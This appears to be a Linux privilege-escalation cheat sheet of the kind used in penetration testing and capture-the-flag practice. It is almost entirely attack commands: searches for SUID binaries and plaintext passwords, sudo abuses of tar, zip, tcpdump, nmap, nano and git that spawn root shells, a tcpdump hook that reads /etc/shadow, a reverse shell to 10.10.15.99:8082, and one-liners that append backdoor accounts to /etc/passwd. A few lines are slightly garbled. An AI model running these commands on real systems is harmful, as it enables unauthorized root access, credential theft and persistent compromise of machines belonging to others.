Privilege Escalation

Tools

File Permissions

  • Check file permissions of /etc/passwd and /etc/shadow

Find writable files

find -type f -maxdepth 1 -writable

Generate password hash (md5):

openssl passwd -1
echo 'joske' | openssl passwd -1 -stdin

Generate password hash (sha256):

python -c "import crypt; print crypt.crypt('joske')"

SUID / SGID Binaries

Find SUID

find . -perm /4000

Find GUID

find . -perm /2000

Find SUID / SGID

find . -perm /6000

Find and ls SUID / SGID

find "$DIRECTORY" -perm /6000 -exec ls -la {} \;

Searching world writable files

find / -perm -w ~ -type l -ls 2?/dev/null

Plain text username / password

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla

Commands with sudo

sudo -l

New file Permissions

umask

Exploits

overlayfs

Tar

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.15.99/8082 0>&1' > a.sh
tar -cvf a.tar a.sh
sudo tar -xvf a.tar --to-command /bin/bash

Zip

sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

Strace

sudo strace -o/dev/null /bin/bash

tcpdump

echo $’id\ncat /etc/shadow’ > /tmp/.shell
chmod +x /tmp/.shell
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root

nmap

echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

scp

sudo scp -S /path/yourscript x y

except

sudo except spawn sh then sh

nano

sudo nano -S /bin/bash

type your command and hit CTRL+T

git

sudo git help status

type: !/bin/bash

gdb/ftp

sudo ftp

type : !/bin/sh

Add user with passwd

echo 'user2:*:1002:1003:,,,:/home/user2:/bin/bash' >> /etc/passwd
passwd user2

echo "user2:`openssl passwd -1 -salt user3 pass123`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

echo "user2:`mkpasswd -m SHA-512 pass`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

echo "user2:`python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

echo "user2:`perl -le 'print crypt("pass123", "abc")'`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

echo "user2:`php -r "print(crypt('aarti','123') . \"\n\");"`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

Add root user

adduser username
usermod -aG sudo username

References